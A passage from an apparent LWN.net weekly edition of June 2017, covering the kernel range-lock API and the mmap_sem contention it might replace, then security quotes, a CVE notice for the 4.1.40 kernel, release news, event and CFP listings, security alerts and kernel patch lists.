Since range locks only cover part of a resource, there can be many of them covering separate parts of the resource as a whole. The data structure that describes all of the known range locks, including those that are waiting for the needed range to become available, for a given resource is a "range lock tree", represented by struct range_lock_tree. This "tree" is the lock that protects the resource as a whole; it will be typically located in or near the relevant data structure where one would otherwise find a simpler lock. Thus, a range-locking implementation will tend to start with something like:

    #include <linux/range_lock.h>

    DEFINE_RANGE_LOCK_TREE(my_tree);

Given the range_lock_tree structure to protect the resource, a thread needing access to a portion of that resource will need to acquire a lock on the range of interest. A lock on a specific range (whether granted or not) is represented by struct range_lock. It is possible to declare and initialize a range lock statically with either of:

    DEFINE_RANGE_LOCK(my_lock, start, end);
    DEFINE_RANGE_LOCK_FULL(name);

The second variant above will describe a lock on the entire range. It is also possible to initialize a range_lock structure at run time with either of:

    void range_lock_init(struct range_lock *lock, unsigned long start,
    			 unsigned long end);
    void range_lock_init_full(struct range_lock *lock);

Actually acquiring a range lock requires calling one of a large set of primitives. In the simplest case, a call to range_read_lock() will acquire a read lock on the indicated range, blocking if necessary to wait for the range to become available:

    void range_read_lock(struct range_lock_tree *tree, struct range_lock *lock);

The lock for the entire resource is provided as tree, while lock describes the region that is to be locked. Like most sleeping lock primitives, read_range_lock() will go into a non-interruptible sleep if it must wait. That behavior can be changed by calling one of the other locking functions:

    int range_read_lock_interruptible(struct range_lock_tree *tree,
				      struct range_lock *lock);
    int range_read_lock_killable(struct range_lock_tree *tree, struct range_lock *lock);
    int range_read_trylock(struct range_lock_tree *tree, struct range_lock *lock);

In any case, a read lock that has been granted must eventually be released with:

    void range_read_unlock(struct range_lock_tree *tree, struct range_lock *lock);

If, instead, the range must be written to, a write lock should be obtained with one of:

    void range_write_lock(struct range_lock_tree *tree, struct range_lock *lock);
    int range_write_lock_interruptible(struct range_lock_tree *tree,
				       struct range_lock *lock);
    int range_write_lock_killable(struct range_lock_tree *tree, struct range_lock *lock);
    int range_write_trylock(struct range_lock_tree *tree, struct range_lock *lock);

A call to range_write_unlock() will release a write lock. It is also possible to turn a write lock into a read lock with:

    void range_downgrade_write(struct range_lock_tree *tree, struct range_lock *lock);

The implementation does not give any particular priority to either readers or writers. If a writer is waiting for a given range, a reader that arrives later requesting an intersecting range will wait behind the writer, even if other readers are active in that range at the time. The result is, possibly, less concurrency than might otherwise be possible, but this approach also ensures that writers will not be starved for access.

This patch set has been through a few revisions and does not seem to be generating much more in the way of comments, so it might be about ready to go. The first user is the Lustre filesystem, which is already using a variant of Kara's range-lock implementation internally to control access to ranges of files. But there is a potentially more interesting user waiting on the wings: using range locks as a replacement for mmap_sem.

The reader/writer semaphore known as mmap_sem is one of the most intractable contention points in the memory-management subsystem. It protects a process's memory map, including, to an extent, the page tables. Many performance-sensitive operations, such as handling page faults, must acquire mmap_sem with the result that, on many workloads, contention for mmap_sem is a significant performance bottleneck. Protecting a process's virtual address space would appear to be a good application for a range lock. Most of the time, a change to the address space does not affect the entire space; it is, instead, focused on a particular set of addresses. Using range locks would allow more operations on a given address space to proceed concurrently, reducing contention and improving performance.

The patch set (posted by Laurent Dufour) does not yet achieve that goal; instead, the entire range is locked every time. Thus, with these patches, a range lock replaces mmap_sem without really changing how things work. Restricting the change in this way allows the developers to be sure that the switch to a range lock has not introduced any bugs of its own. Once confidence in that change exists, developers will be able to start reducing the ranges to what is actually needed.

These changes will need to be made with care, especially since what is being protected by mmap_sem is not always clear. But, given enough development cycles, the mmap_sem bottleneck should slowly dissolve away, leaving us with a faster, more concurrent memory-management subsystem. Some improvements are worth waiting for.

Comments (10 posted)

Security quotes of the week

In fact nobody really cared about pollution until a river actually lit on fire. There are still some who don't, even after a river lit on fire.

I think there are many of us in security who keep waiting for demand to appear for more security. We keep watching and waiting, any day now everyone will see why this matters! It's not going to happen though. We do need security more and more each day. The way everything is heading, things aren't looking great. I'd like to think we won't have to wait for the security equivalent of a river catching on fire, but I'm pretty sure that's what it will take.

— Josh Bressers

Up till now, we've known how to make two kinds of fairly secure system. There's the software in your phone or laptop which is complex and exposed to online attack, so has to be patched regularly as vulnerabilities are discovered. It's typically abandoned after a few years as patching too many versions of software costs too much. The other kind is the software in safety-critical machinery which has tended to be stable, simple and thoroughly tested, and not exposed to the big bad Internet. As these two worlds collide, there will be some rather large waves.

Regulators who only thought in terms of safety will have to start thinking of security too. Safety engineers will have to learn adversarial thinking. Security engineers will have to think much more about ease of safe use. Educators will have to start teaching these subjects together. (I just expanded my introductory course on software engineering into one on software and security engineering.) And the policy debate will change too; people might vote for the FBI to have a golden master key to unlock your iPhone and read your private messages, but they might be less likely to vote them a master key to take over your car or your pacemaker.

— Ross Anderson

People inside the NSA are quick to discount these studies, saying that the data don't reflect their reality. They claim that there are entire classes of vulnerabilities the NSA uses that are not known in the research world, making rediscovery less likely. This may be true, but the evidence we have from the Shadow Brokers is that the vulnerabilities that the NSA keeps secret aren't consistently different from those that researchers discover. And given the alarming ease with which both the NSA and CIA are having their attack tools stolen, rediscovery isn't limited to independent security research.

— Bruce Schneier

Comments (none posted)

Kernel release status

The current development kernel is 4.12-rc4, which was released on June 4. Linus Torvalds is generally happy with where things are: "Things remain fairly calm for 4.12, although not quite as calm as it appeared earlier in the week. I think two thirds of the commits came in on Friday or the weekend. But timing aside, it all looks fairly normal."

Stable kernels: 4.11.4, 4.9.31, 4.4.71, and 3.18.56 were released on June 7.

Comments (none posted)

Linux 4.1.40 is vulnerable to CVE-2017-6074

Mark H. Weaver has sent us an alert that the 4.1.40 long-term stable kernel is still susceptible to CVE-2017-6074, which is a local privilege escalation that was reported back in February and has been in Linux for more than ten years. An updated version of the kernel from maintainer Sasha Levin is expected soon.

Full Story (comments: none)

Gentoo dropping support of SPARC

The Gentoo security team has announced that the SPARC architecture will no longer be supported by the security team. "This decision follows the council decision on 2016-12-11, 'The council defers to the security team, but is supportive of dropping security support for sparc if it is unable to generally meet the security team timelines.'"

Full Story (comments: 12)

Distribution quote of the week

So I suggest to introduce a new bug report severity "annoying" which is placed somewhere around "normal", but is one of the "release-critical" severities.

Any bug with that severity and at least three "me too" or "+1" postings is allowed to be fixed with a zero-day NMU.

Additionally I suggest a new tag for bug reports named "popcorn": It's similar to the "security" tag, where all bugs tagged as "security" automatically take the security team into Cc. All bugs tagged with "popcorn" are automatically carbon-copied to the debian-curiosa mailing list.

— Axel Beckert

Comments (none posted)

GDB 8.0 released

Version 8.0 of the GDB debugger is out. Changes in this release include some Python scripting enhancements, DWARF version 5 support, some new targets, and more.

Full Story (comments: none)

GnuPG funding campaign

The GnuPG Project has announced the launch of a funding campaign to further support and improve its mail and data encryption software, GnuPG. "The 6 person development team is currently financed from a successful campaign in early 2015, regular donations from the Linux Foundation, Stripe, Facebook, and a few paid development projects. To ensure long-term stability the new campaign focuses on recurring donations and not one-time donations."

Full Story (comments: 1)

Rivendell v2.16.0

Rivendell 2.16.0 has been released. Rivendell is a radio automation system targeted for use in professional broadcast environments. This version includes audio store hashing, kernel GPIO, Modbus TCP support, and more.

Full Story (comments: none)

Tor Browser 7.0 released

The Tor Browser Team has announced the first stable release in the 7.0 series. "This release brings us up to date with Firefox 52 ESR which contains progress in a number of areas: Most notably we hope having Mozilla's multiprocess mode (e10s) and content sandbox enabled will be one of the major new features in the Tor Browser 7.0 series, both security- and performance-wise. While we are still working on the sandboxing part for Windows (the e10s part is ready), both Linux and macOS have e10s and content sandboxing enabled by default in Tor Browser 7.0. In addition to that, Linux and macOS users have the option to further harden their Tor Browser setup by using only Unix Domain sockets for communication with tor."

Comments (none posted)

Development quotes of the week

Neil did heroic work forcing my crappy software into doing things I never envisioned. Last year he needed a break and asked me to take vmdebootstrap back. I did, and have been hiding from the public eye ever since, since I was so ashamed of the code. (I created a new identity and pretended to be an international assassin and backup specialist, travelling the world forcing people to have at least one tested backup of their system. If you've noticed reports in the press about people reporting near-death experiences while holding a shiny new USB drive, that would've been my fault.)

— Lars Wirzenius (Thanks to Paul Wise)

Riddell to be kicked until adding openqa to Neon

— Jonathan Riddell (KDE Plasma 5.11 kicks off)

Comments (none posted)

FSF: Judge won't dismiss alleged GPL violation: Why this matters

Last month LWN pointed to an article about the Artifex v. Hancom case, in which Hancom used Artifex's Ghostscript in its office product. The Free Software Foundation looks at the case and the recent ruling. "On the latter, the judge found that the business model of Artifex indicated a loss of revenue, but also noted that harm could be found even where money isn't involved. The judge, quoting a prior case, noted that there are 'substantial benefits, including economic benefits, to the creation and distribution of copyrighted works under public licenses that range far beyond traditional license royalties.' While not [dispositive], this last note is particularly interesting for many free software developers, who generally share their work at no cost."

Full Story (comments: none)

DistroWatch Weekly (June 5)

Lunar Linux Weekly News (June 2)

Mageia Weekly Roundup (June 4)

openSUSE Tumbleweed Review of the Week (June 2)

Tails Report (May)

Ubuntu Server Development Summary (June 2)

Ubuntu Weekly Newsletter (June 4)

These Weeks in Firefox (June 6)

Free Software Supporter (June)

What's cooking in git.git (June 2)

What's cooking in git.git (June 5)

LLVM Weekly (June 5)

OCaml Weekly News (June 6)

Perl Weekly (June 5)

PostgreSQL Weekly News (June 4)

This Week in Rust (June 6)

Wikimedia Tech News (June 5)

Fedora FESCO meeting minutes (June 2)

GNOME Foundation Board Minutes (May 16)

GNOME Foundation Board Minutes (May 23)

CFP Deadlines: June 8, 2017 to August 7, 2017

The following listing of CFP deadlines is taken from the LWN.net CFP Calendar.

Deadline	Event Dates	Event	Location
June 8	August 25 August 27	GNU Hackers' Meeting 2017	Kassel, Germany
June 11	August 6 August 12	DebConf 2017	Montreal, Quebec, Canada
June 15	October 25 October 27	KVM Forum 2017	Prague, Czech Republic
June 15	August 9 August 11	The Perl Conference	Amsterdam, Netherlands
June 16	October 31 November 2	API Strategy & Practice Conference	Portland, OR, USA
June 20	June 26 June 28	19th German Perl Workshop 2017 in Hamburg	Hamburg, Germany
June 24	August 28 September 1	10th European Conference on Python in Science	Erlangen, Germany
June 30	November 21 November 24	Open Source Monitoring Conference 2017	Nürnberg, Germany
June 30	October 21	7th Real-Time Summit	Prague, Czech Republic
June 30	September 8 September 10	GNU Tools Cauldron 2017	Prague, Czech Republic
July 8	October 23 October 25	Open Source Summit Europe	Prague, Czech Republic
July 8	October 23 October 25	Embedded Linux Conference Europe	Prague, Czech Republic
July 10	August 26	FOSSCON	Philadelphia, PA, USA
July 14	September 29 September 30	Ohio LinuxFest	Columbus, OH, USA
July 14	November 6 November 8	OpenStack Summit	Sydney, Australia
July 15	November 4 November 5	Free Society Conference and Nordic Summit	Oslo, Norway
July 18	October 6 October 8	PyGotham	New York, NY, USA
July 30	October 25 October 27	PyCon DE	Karlsruhe, Germany
July 31	December 4 December 6	PGconf.ASIA 2017	Tokyo, Japan
July 31	August 25 August 26	Swiss Perl Workshop	Villars-sur-Ollon, Switzerland
August 1	April 9 April 12	‹Programming› 2018	Nice, France
August 1	August 22 August 29	Nextcloud Conference	Berlin, Germany
August 1	September 26	OpenStack Days UK	London, UK
August 2	September 20 September 22	X.org Developers Conference	Mountain View, CA, USA
August 2	October 4 October 5	Lustre Administrator and Developer Workshop	Paris, France
August 6	October 6 October 7	Seattle GNU/Linux Conference	Seattle, WA, USA
August 6	January 22 January 26	linux.conf.au	Sydney, Australia

If the CFP deadline for your event does not appear here, please tell us about it.

Events: June 8, 2017 to August 7, 2017

The following event listing is taken from the LWN.net Calendar.

Date(s)	Event	Location
June 9	PgDay Argentina 2017	Santa Fe, Argentina
June 9 June 10	Hong Kong Open Source Conference 2017	Hong Kong, Hong Kong
June 9 June 11	SouthEast LinuxFest	Charlotte, NC, USA
June 12 June 14	PyCon Israel	Ramat Gan, Israel
June 12 June 15	OPNFV Summit	Beijing, China
June 18 June 23	The Perl Conference	Washington, DC, USA
June 19 June 20	LinuxCon + ContainerCon + CloudOpen China	Beijing, China
June 20 June 22	O’Reilly Fluent Conference	San Jose, CA, USA
June 20 June 22	O'Reilly Velocity Conference	San Jose, CA, USA
June 20 June 23	Open Source Bridge	Portland, OR, USA
June 23 June 24	QtDay 2017	Florence, Italy
June 24	Tuebix: Linux Conference	Tuebingen, Germany
June 24 June 25	Enlightenment Developer Days 2017	Valletta, Malta
June 26 June 28	19th German Perl Workshop 2017 in Hamburg	Hamburg, Germany
June 26 June 28	Deutsche Openstack Tage 2017	München, Germany
June 26 June 29	Postgres Vision	Boston, MA, USA
June 27 June 29	O’Reilly Artificial Intelligence Conference	New York, NY, USA
June 30	Swiss PGDay	Rapperswil, Switzerland
July 3 July 7	13th Netfilter Workshop	Faro, Portugal
July 9 July 16	EuroPython 2017	Rimini, Italy
July 10 July 16	SciPy 2017	Austin, TX, USA
July 16 July 23	CoderCruise	New Orleans et. al., USA/Caribbean
July 16 July 21	IETF 99	Prague, Czech Republic
July 22 July 27	Akademy 2017	Almería, Spain
July 28 August 2	GNOME Users And Developers European Conference 2017	Manchester, UK
August 3 August 8	PyCon Australia 2017	Melbourne, Australia
August 5 August 6	Conference for Open Source Coders, Users and Promoters	Taipei, Taiwan
August 6 August 12	DebConf 2017	Montreal, Quebec, Canada

If your event does not appear here, please tell us about it.

Alert summary June 1, 2017 to June 7, 2017

Dist.	ID	Release	Package	Date
Arch Linux	ASA-201706-8		chromium	2017-06-07
Arch Linux	ASA-201706-2		freeradius	2017-06-02
Arch Linux	ASA-201706-4		gajim	2017-06-05
Arch Linux	ASA-201706-3		libtasn1	2017-06-02
Arch Linux	ASA-201706-5		libusbmuxd	2017-06-05
Arch Linux	ASA-201706-6		tomcat7	2017-06-06
Arch Linux	ASA-201706-7		tomcat8	2017-06-06
Debian	DLA-981-1	LTS	apng2gif	2017-06-07
Debian	DLA-977-1	LTS	freeradius	2017-06-05
Debian	DLA-980-1	LTS	ming	2017-06-06
Debian	DSA-3872-1	stable	nss	2017-06-01
Debian	DLA-972-1	LTS	openldap	2017-06-01
Debian	DLA-978-1	LTS	perl	2017-06-05
Debian	DSA-3873-1	stable	perl	2017-06-05
Debian	DLA-974-1	LTS	picocom	2017-06-01
Debian	DLA-973-1	LTS	strongswan	2017-06-01
Debian	DLA-975-1	LTS	wordpress	2017-06-02
Debian	DLA-976-1	LTS	yodl	2017-06-05
Debian	DSA-3871-1	stable	zookeeper	2017-06-01
Fedora	FEDORA-2017-7d698eba8b	F24	chromium	2017-06-03
Fedora	FEDORA-2017-7d698eba8b	F24	chromium-native_client	2017-06-03
Fedora	FEDORA-2017-b22de5c767	F24	dropbear	2017-06-04
Fedora	FEDORA-2017-8e9bd58cbb	F25	dropbear	2017-06-05
Fedora	FEDORA-2017-c7c3f7ed26	F25	libtasn1	2017-06-06
Fedora	FEDORA-2017-690eedcf41	F25	poppler	2017-06-06
Fedora	FEDORA-2017-0b6da97aa5	F24	squirrelmail	2017-06-03
Fedora	FEDORA-2017-f85c37ae3d	F25	squirrelmail	2017-06-03
Fedora	FEDORA-2017-54580efa82	F25	sudo	2017-06-03
Fedora	FEDORA-2017-22f1a8404e	F25	wget	2017-06-03
Gentoo	201706-05		dbus	2017-06-06
Gentoo	201706-09		filezilla	2017-06-06
Gentoo	201706-14		freetype	2017-06-06
Gentoo	201706-04		git	2017-06-06
Gentoo	201706-06		imageworsener	2017-06-06
Gentoo	201706-11		libpcre	2017-06-06
Gentoo	201706-13		minicom	2017-06-06
Gentoo	201706-01		munge	2017-06-06
Gentoo	201706-08		mupdf	2017-06-06
Gentoo	201706-10		pidgin	2017-06-06
Gentoo	201706-03		qemu	2017-06-06
Gentoo	201706-07		rpcbind	2017-06-06
Gentoo	201706-02		shadow	2017-06-06
Gentoo	201706-15		webkit-gtk	2017-06-07
Gentoo	201706-12		wireshark	2017-06-06
Mageia	MGASA-2017-0153	5	git	2017-06-04
Mageia	MGASA-2017-0155	5	menu-cache	2017-06-04
Mageia	MGASA-2017-0152	5	openvpn	2017-06-01
Mageia	MGASA-2017-0154	5	pcmanfm	2017-06-04
openSUSE	openSUSE-SU-2017:1497-1	42.2	deluge	2017-06-07
openSUSE	openSUSE-SU-2017:1485-1	42.2	libupnp	2017-06-05
openSUSE	openSUSE-SU-2017:1475-1	42.2	mariadb	2017-06-02
openSUSE	openSUSE-SU-2017:1495-1	42.2	postgresql93	2017-06-07
Oracle	ELSA-2017-3579	OL6	kernel	2017-06-01
Oracle	ELSA-2017-3580	OL6	kernel	2017-06-01
Oracle	ELSA-2017-3579	OL7	kernel	2017-06-01
Oracle	ELSA-2017-3580	OL7	kernel	2017-06-01
Oracle	ELSA-2017-1381	OL5	sudo	2017-06-02
SUSE	SUSE-SU-2017:1471-1	SLE11	strongswan	2017-06-01
Ubuntu	USN-3311-1	14.04 16.04 16.10 17.04	libnl3	2017-06-06
Ubuntu	USN-3309-1	14.04 16.04 16.10 17.04	libtasn1-6	2017-06-05
Ubuntu	USN-3310-1	16.04 16.10 17.04	lintian	2017-06-06
Ubuntu	USN-3312-1	16.04	linux, linux-aws, linux-gke, linux-raspi2, linux-snapdragon	2017-06-06
Ubuntu	USN-3313-1	16.10	linux, linux-raspi2	2017-06-06
Ubuntu	USN-3314-1	17.04	linux, linux-raspi2	2017-06-06
Ubuntu	USN-3313-2	16.04	linux-hwe	2017-06-06
Ubuntu	USN-3312-2	14.04	linux-lts-xenial	2017-06-06
Ubuntu	USN-3308-1	14.04	puppet	2017-06-05

Full Story (comments: none)

Linus Torvalds Linux 4.12-rc4 Jun 04

Greg KH Linux 4.11.4 Jun 07

Greg KH Linux 4.9.31 Jun 07

Greg KH Linux 4.4.71 Jun 07

Greg KH Linux 3.18.56 Jun 07

Ben Hutchings Linux 3.16.44 Jun 06

Ben Hutchings Linux 3.2.89 Jun 06

Will Deacon Add support for the ARMv8.2 Statistical Profiling Extension Jun 05

Shilpasri G Bhat Add support for OCC command/response interface Jun 05

Anju T Sudhakar IMC Instrumentation Support Jun 05

Ram Pai powerpc: Memory Protection Keys Jun 05

Palmer Dabbelt RISC-V Linux Port v2 Jun 06

Kirill A. Shutemov x86: 5-level paging enabling for v4.13, Part 4 Jun 06

Waiman Long locking/rwsem: Enable reader optimistic spinning Jun 01

Joe Lawrence livepatch: add shadow variable API Jun 01

Sergey Senozhatsky printk: introduce printing kernel threads Jun 02

Goldwyn Rodrigues No wait AIO Jun 05

Nicolas Pitre scheduler tinification Jun 06

Aleksa Sarai tty: add TIOCGPTPEER ioctl Jun 02

Elaine Zhang clk: rockchip: support clk controller for RK3128 SoC Jun 02

Guodong Xu MFD: add driver for HiSilicon Hi6421v530 PMIC Jun 02

Thomas Petazzoni Add support for the ICU unit in Marvell Armada 7K/8K Jun 02

Paolo Pisati [PATCH v3 0/2] Lattice MachXO2 Slave SPI FPGA Manager support Jun 02

Raviteja Garimella Support for USB DRD Phy driver for NS2 Jun 02

Gregory CLEMENT Add support for the pin and gpio controllers on the Marvell Armada 7K/8K Jun 02

Richard Fitzgerald Add support for Cirrus Logic CS47L35/L85/L90/L91 codecs Jun 02

sean.wang@mediatek.com Add PMIC support to MediaTek MT7622 SoC Jun 03

Al Cooper Add Broadcom STB USB phy driver Jun 02

Srinath Mannam Broadcom Stingray SATA PHY support Jun 05

Antoine Tenart ARM: sun5i: cryptographic engine support Jun 01

thor.thayer@linux.intel.com Add Altera I2C Controller Driver Jun 02

Adrian Hunter scsi: ufs: Add PCI driver for Intel Host controllers Jun 05

Russell King - ARM Linux Add phylib support for MV88X3310 10G phy Jun 05

Heikki Krogerus New driver for UCSI (USB Type-C) Jun 05

Markus Mayer thermal: add brcmstb AVS TMON driver Jun 05

Andrew Jeffery hwmon: Add support for MAX31785 intelligent fan controller Jun 06

Keiji Hayashibara add UniPhier watchdog support Jun 06

Rajmohan Mani TPS68470 PMIC drivers Jun 06

Mika Westerberg pinctrl: Add support for Intel Cannon Lake PCH Jun 06

Mason irqchip: Add support for tango interrupt router Jun 06

Andrey Smirnov mfd: Add driver for RAVE Supervisory Processor Jun 06

Christopher Bostic FSI device driver implementation Jun 06

Wang Yafei Add driver for GOODiX GTx5 series touchsereen Jun 07

Johannes Thumshirn Implement NVMe Namespace Descriptor Identification Jun 02

Mika Westerberg Thunderbolt security levels and NVM firmware upgrade Jun 02

Takashi Iwai Revised full patchset for PCM in-kernel copy support Jun 01

Ross Zwisler Add support for Heterogeneous Memory Attribute Table Jun 02

Luis R. Rodriguez firmware: add driver data API Jun 05

Christoph Hellwig dedicated error codes for the block layer V3 Jun 03

"Christoph Paasch" (via mptcp-dev Mailing List) <mptcp-dev-1cNGNKGn6cRWdXg3Zgxhqoble9XqW/aP@public.gmane.org> MPTCP Stable Release v0.92 Jun 04

Matt Brown Add Trusted Path Execution as a stackable LSM Jun 03

Jason A. Donenfeld get_random_bytes_wait family of APIs Jun 05

Igor Stoppa Read-only protection for dynamic data Jun 05

Vitaly Kuznetsov Hyper-V: praravirtualized remote TLB flushing and hypercall improvements Jun 01

Stefano Stabellini introduce the Xen PV Calls backend Jun 02

Karel Zak util-linux v2.30 Jun 02

LWN.net Weekly Edition for June 8, 2017

Common constraints on data collection

The dilemma of data sharing

Problems with de-identification

Proposed remedies

Practical problems

Options

MicroPython versus CPython

PSF board

Why beta?

Ordered dictionaries

Python as a security vulnerability

PyCharm update

Jython

Block-layer error codes

Reporting writeback errors

Brief items

Security

Kernel development

Distributions

Development

Miscellaneous

Announcements

Newsletters

Distributions and system administration

Development

Meeting minutes

Calls for Presentations

CFP Deadlines: June 8, 2017 to August 7, 2017

Upcoming Events

Events: June 8, 2017 to August 7, 2017

Security updates

Kernel patches of interest

Kernel releases

Architecture-specific

Core kernel

Device drivers

Device-driver infrastructure

Filesystems and block layer

Networking

Security-related

Virtualization and containers

Miscellaneous